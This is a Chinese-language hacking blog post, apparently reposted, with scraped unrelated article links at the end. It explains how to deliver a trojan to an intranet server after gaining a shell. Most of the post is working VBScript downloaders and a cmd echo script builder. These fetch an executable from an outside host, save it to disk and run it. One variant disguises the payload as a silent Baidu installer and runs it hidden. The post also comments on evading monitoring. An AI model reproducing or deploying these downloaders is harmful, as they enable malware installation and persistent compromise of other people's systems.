当拿到shell到手,服务器是内网,你又没有条件映射,服务器又穿不上东西

是不是很郁闷,还有我们还有vbs,能执行cmd命令就有希望

一、VBS下载者:

复制代码 代码如下:

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://www.jbzj.com/muma.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:\zl.exe",2
wscript.sleep 1000
Shell.Run ("c:\zl.exe") '延迟过后执行下载文件

二、cmd下执行的版本:

复制代码 代码如下:

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://www.jbzj.com/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:\zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:\zl.exe") >>zl.vbs

三、wget.vbs

复制代码 代码如下:

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XMLHTTP")
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2

使用方法:cscript wget.vbs http://www.jbzj.com/muma.exe

第一种是普通下载者,可能会被监控到,反正是我用它下载exe,每次都执行超时估计是被拦截了,但是它代码短小,能旋转~~,你可以用他下载其他的VBS

列如 VBS传马病毒

on error resume next

iLocal=LCase(Wscript.Arguments(1))

iRemote=LCase(Wscript.Arguments(0))

iUser=LCase(Wscript.Arguments(2))

iPass=LCase(Wscript.Arguments(3))

set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")

if iUser="" and iPass="" then

xPost.Open "GET","http://www.dqsfjd.cn/bd.jpg",0

else

xPost.Open "GET",iRemote,0,iUser,iPass

end if

xPost.Send()

set sGet=CreateObject("ADODB.Stream")

sGet.Mode=3

sGet.Type=1

sGet.Open()

sGet.Write xPost.ResponseBody

sGet.SaveToFile "C:\Baidusd_OnlineSetup_sid_30084_silent.exe",2

Set objShell = CreateObject("Wscript.Shell")

objShell.Run "C:\Baidusd_OnlineSetup_sid_30084_silent.exe", 0

Wscript.Sleep 1000

on error resume next

iLocal=LCase(Wscript.Arguments(1))

iRemote=LCase(Wscript.Arguments(0))

iUser=LCase(Wscript.Arguments(2))

iPass=LCase(Wscript.Arguments(3))

set xPost=CreateObject("Microsoft.XML" & tian6 & "HTTP")

这段代码是将bd.jpg下载并保存为C:\Baidusd_OnlineSetup_sid_30084_silent.exe,然后执行

使用方法 cscript c:\xia.vbs

此段代码执行成功率高,

实验证明VBS传马病毒,CMD命令echo保存时不行的,所以就要用到。vbs下载者把VBS传马病毒下载到服务器上

转载于:https://www.cnblogs.com/h4ck0ne/p/5154601.html

VBS下载者助以一臂之力相关推荐

  1. ue4设置图片大小_如何达成照片级渲染效果,UE4来助你一臂之力

    原标题:如何达成照片级渲染效果,UE4来助你一臂之力 silujy:Lasse Rode在探求使用实时渲染工具表现照片级场景的过程中,利用虚幻引擎做了一些颇为有益的尝试.表现对象则是一间唯美的,几乎是 ...

  2. 做工控的朋友,留着可能有不时之需.2011工控破解,助你一臂之力!

    做工控的朋友,留着可能有不时之需.2011工控破解,助你一臂之力! 2011年05月11日 Monitor Pro―Schneider-施耐德monitor pro 7.2_7.6独家破解[ft=,2 ...

  3. boot客户管理系统实训报告_客户太多,客户转化困难?分析报告迟迟出不来,CRM客户管理系统助你一臂之力...

    原标题:客户太多,客户转化困难?分析报告迟迟出不来,CRM客户管理系统助你一臂之力 作者:Teamface 企业中,每天接触的客户太多,时间太长根本记不住谁是谁,难以分清楚是否还是企业的意向客户,很容 ...

  4. 上海网站排名优化找哪家?清法网络助你一臂之力

    说到网站排名优化,相信大部分企业都不陌生.它是指通过搜索引擎优化(seo)方式,使品牌网站在搜索结果中排名靠前.不过,由于网站的自然排名一般是搜索引擎对所有相关网页抓取结果自动分析.自动排名的体现,想 ...

  5. IB学霸分享学习经验(家长如何助孩子一臂之力)

    一.通用的学习经验 1.找到好的学习伙伴 和内地高中会一直上学至高考前不同的是,香港大部分学校有study leave的传统,就是从高考前一个多月至两个多月(按学校自己的规定)开始放假,让考生能够自由 ...

  6. 文明重启怎么找回之前的服务器,文明重启房子消失怎么找回 详尽攻略助你一臂之力...

    屋子怎么看不到了?文明重启房子消失怎么找回?还不知道的朋友看过来,这儿小编为各位提供王牌战争文明重启关于房子的攻略详解!感兴趣的朋友不容错失喔! 屋子消散解决之道攻略 然而并非呆在屋子中就十拿九稳了, ...

  7. 可以背在身后的机器人助你一臂之力

    文章来源:ATYUN AI平台 成本和工程限制意味着大多数远程呈现机器人都是iPad-on-a-stick外形的变体.但他们并非必须如此.看看这个由日本庆应义塾大学和东京大学的工程师建造的远程呈现机器 ...

  8. 狂刷《Java权威面试指南(阿里版)》,助你一臂之力,事半功倍

    莫慌莫慌,"面试造火箭,工作拧螺丝" 说得不无道理,偶然从朋友那得到的这份Alibaba内部疯传<Java权威面试指南(阿里版)>堪称精品,或可能助你一臂之力,事半功倍 ...

  9. 这份 Alibaba 内部疯传《Java 权威面试指南(阿里版)》堪称精品,面试助你一臂之力,事半功倍

    今年金三银四.金九银十情况都不太好,很多小伙伴都没找到工作,不少小伙伴都在经历了这个惨痛的寒冬后开始暗戳戳的备战明年的金三银四了,"面试造火箭,工作拧螺丝" 说得不无道理,偶然从朋 ...

最新文章

  1. ajax技术如何实现,ajax技术的基本原来以及实现过程
  2. 你不该错过的2020中国开源年报,填开源开发者问卷,成为国内开源的见证者
  3. Andoid 采用ListView三种显示数据列表
  4. Java笔记05-Collection、泛型、迭代器
  5. PHP的stdClass
  6. 紫金计算机网络,南京理工大学紫金学院《计算机网络技术》考试复习试题试题[含答案解析]...
  7. elisa标准曲线怎么做_Curve Expert软件绘制ELISA标准曲线流程 | 每日生物评论
  8. 2020流行的液态风格PNG免扣素材,竟然被我找到了!
  9. surfer画世界频率分布图(等高线、地点标注)
  10. 路由器无线中继/桥接(WDS)设置
  11. PE装错盘,装到移动硬盘的资料恢复办法
  12. linux执行startx进入桌面黑屏,linux下误操作startx命令后,在登录界面进不去解决办法...
  13. C语言的s8数据结构
  14. padavan做副路由,主路由是原厂固件,如何使用adguardHome过滤广告
  15. 大疆飞行模拟器 下载、安装及使用教程
  16. HTTP状态404-未找到
  17. C#连接Access数据库(详解)
  18. cadlisp框选打印_我有好多CAD图纸要打印,一张一张的选取打印太麻烦了,请教高手有没有什么好的办法帮小弟一下、!..十分感...
  19. 如何跳过Nexus 7二代的开机设置
  20. 使用MODIS数据筛选火点

热门文章

  1. 用aardio 实现 access数据库迁移到sqlite
  2. 【AI大模型】国产360大模型智脑大模型介绍
  3. 【MPC5744P】S32DS中Processor Expert自动生成代码工具使用教程(一) 开发环境搭建
  4. substring方法截取字符串以及其他方式
  5. 给html5添加极验,Django中使用极验Geetest滑动验证码过程解析
  6. springboot-js通过class获取元素并修改css
  7. vue 中插槽的三种类型
  8. Linux下使用Mysql 第一天
  9. 18个实时音视频开发中会用到开源项目
  10. 【无标题】看来学c++真的需要细心啊!